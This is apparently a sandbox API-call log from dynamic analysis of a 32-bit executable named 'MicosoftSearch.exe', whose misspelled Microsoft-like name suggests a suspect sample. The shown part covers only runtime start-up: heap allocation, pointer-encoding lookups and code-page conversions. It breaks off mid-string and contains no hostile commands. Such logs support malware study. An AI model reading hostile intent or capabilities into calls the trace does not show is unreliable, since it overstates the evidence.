# Flog Txt Version 1 # Analyzer Version: 3.0.2 # Analyzer Build Date: Jun 6 2019 12:21:16 # Log Creation Date: 07.07.2019 23:39:11.219 Process: id = "1" image_name = "micosoftsearch.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\micosoftsearch.exe" page_root = "0x4e328000" os_pid = "0x954" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MicosoftSearch.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0x958 [0029.086] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0x3debffd0, dwHighDateTime=0x1d5351d)) [0029.086] GetCurrentProcessId () returned 0x954 [0029.086] GetCurrentThreadId () returned 0x958 [0029.086] GetTickCount () returned 0x187f3 [0029.086] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=14938021749) returned 1 [0029.240] GetStartupInfoW (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MicosoftSearch.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x18ff84, hStdError=0x42c114)) [0029.241] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x210000 [0029.242] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0029.242] GetProcAddress (hModule=0x76c20000, lpProcName="FlsAlloc") returned 0x76c34f2b [0029.242] GetProcAddress (hModule=0x76c20000, lpProcName="FlsGetValue") returned 0x76c31252 [0029.242] GetProcAddress (hModule=0x76c20000, lpProcName="FlsSetValue") returned 0x76c34208 [0029.242] GetProcAddress (hModule=0x76c20000, lpProcName="FlsFree") returned 0x76c3359f [0029.242] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0029.242] GetProcAddress (hModule=0x76c20000, lpProcName="EncodePointer") returned 0x77170fcb [0029.242] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0029.242] GetProcAddress (hModule=0x76c20000, lpProcName="EncodePointer") returned 0x77170fcb [0029.242] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0029.243] GetProcAddress (hModule=0x76c20000, lpProcName="EncodePointer") returned 0x77170fcb [0029.243] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0029.243] GetProcAddress (hModule=0x76c20000, lpProcName="EncodePointer") returned 0x77170fcb [0029.243] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0029.243] GetProcAddress (hModule=0x76c20000, lpProcName="EncodePointer") returned 0x77170fcb [0029.243] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0029.243] GetProcAddress (hModule=0x76c20000, lpProcName="EncodePointer") returned 0x77170fcb [0029.243] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0029.243] GetProcAddress (hModule=0x76c20000, lpProcName="EncodePointer") returned 0x77170fcb [0029.244] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0029.244] GetProcAddress (hModule=0x76c20000, lpProcName="DecodePointer") returned 0x77169d35 [0029.244] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x214) returned 0x2107d0 [0029.244] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0029.244] GetProcAddress (hModule=0x76c20000, lpProcName="DecodePointer") returned 0x77169d35 [0029.244] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0029.244] GetProcAddress (hModule=0x76c20000, lpProcName="EncodePointer") returned 0x77170fcb [0029.244] GetProcAddress (hModule=0x76c20000, lpProcName="DecodePointer") returned 0x77169d35 [0029.244] GetCurrentThreadId () returned 0x958 [0029.244] GetStartupInfoA (in: lpStartupInfo=0x18fea4 | out: lpStartupInfo=0x18fea4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MicosoftSearch.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0029.244] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x800) returned 0x2109f0 [0029.245] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0029.245] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0029.245] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0029.245] SetHandleCount (uNumber=0x20) returned 0x20 [0029.245] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MicosoftSearch.exe\" " [0029.245] GetEnvironmentStringsW () returned 0xb21ca0* [0029.245] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x0, Size=0xaca) returned 0x2111f8 [0029.245] FreeEnvironmentStringsW (penv=0xb21ca0) returned 1 [0029.245] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x927d08, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MicosoftSearch.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\micosoftsearch.exe")) returned 0x38 [0029.245] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x0, Size=0x7a) returned 0x211cd0 [0029.245] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x98) returned 0x211d58 [0029.245] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x3e) returned 0x211df8 [0029.245] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x6c) returned 0x211e40 [0029.245] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x6e) returned 0x211eb8 [0029.245] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x78) returned 0x211f30 [0029.245] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x62) returned 0x211fb0 [0029.245] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x2e) returned 0x212020 [0029.245] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x48) returned 0x212058 [0029.245] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x28) returned 0x2120a8 [0029.245] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x1a) returned 0x2120d8 [0029.245] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x4a) returned 0x212100 [0029.245] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x72) returned 0x212158 [0029.245] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x30) returned 0x2121d8 [0029.245] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x2e) returned 0x212210 [0029.245] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x1c) returned 0x212248 [0029.245] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0xd2) returned 0x212270 [0029.245] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x7c) returned 0x212350 [0029.246] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x36) returned 0x2123d8 [0029.246] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x3a) returned 0x212418 [0029.246] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x90) returned 0x212460 [0029.246] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x24) returned 0x2124f8 [0029.246] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x30) returned 0x212528 [0029.246] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x36) returned 0x212560 [0029.246] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x48) returned 0x2125a0 [0029.246] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x52) returned 0x2125f0 [0029.246] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x3c) returned 0x212650 [0029.246] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x82) returned 0x212698 [0029.246] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x2e) returned 0x212728 [0029.246] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x1e) returned 0x212760 [0029.246] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x2c) returned 0x212788 [0029.246] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x54) returned 0x2127c0 [0029.246] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x52) returned 0x212820 [0029.246] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x2a) returned 0x212880 [0029.246] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x3c) returned 0x2128b8 [0029.246] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x54) returned 0x212900 [0029.246] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x24) returned 0x212960 [0029.246] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x30) returned 0x212990 [0029.246] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x8c) returned 0x2129c8 [0029.246] HeapFree (in: hHeap=0x210000, dwFlags=0x0, lpMem=0x2111f8 | out: hHeap=0x210000) returned 1 [0029.247] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x80) returned 0x212a60 [0029.247] GetLastError () returned 0x0 [0029.247] SetLastError (dwErrCode=0x0) [0029.247] GetLastError () returned 0x0 [0029.247] SetLastError (dwErrCode=0x0) [0029.247] GetLastError () returned 0x0 [0029.247] SetLastError (dwErrCode=0x0) [0029.247] GetACP () returned 0x4e4 [0029.247] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x0, Size=0x220) returned 0x212ae8 [0029.247] GetLastError () returned 0x0 [0029.247] SetLastError (dwErrCode=0x0) [0029.247] IsValidCodePage (CodePage=0x4e4) returned 1 [0029.248] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0029.248] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0029.248] GetLastError () returned 0x0 [0029.248] SetLastError (dwErrCode=0x0) [0029.248] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x18f8e0 | out: lpCharType=0x18f8e0) returned 1 [0029.248] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0029.248] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0029.248] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0029.248] GetLastError () returned 0x0 [0029.248] SetLastError (dwErrCode=0x0) [0029.248] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0029.248] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0029.248] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ蚬䥮倍BĀ") returned 256 [0029.248] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ蚬䥮倍BĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0029.248] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ蚬䥮倍BĀ", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0029.248] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xac\x1b\x52\x47\x9c\xfe\x18", lpUsedDefaultChar=0x0) returned 256 [0029.248] GetLastError () returned 0x0 [0029.248] SetLastError (dwErrCode=0x0) [0029.248] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0029.248] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ蚬䥮倍BĀ") returned 256 [0029.248] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ蚬䥮倍BĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0029.248] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ蚬䥮倍BĀ", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0029.248] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\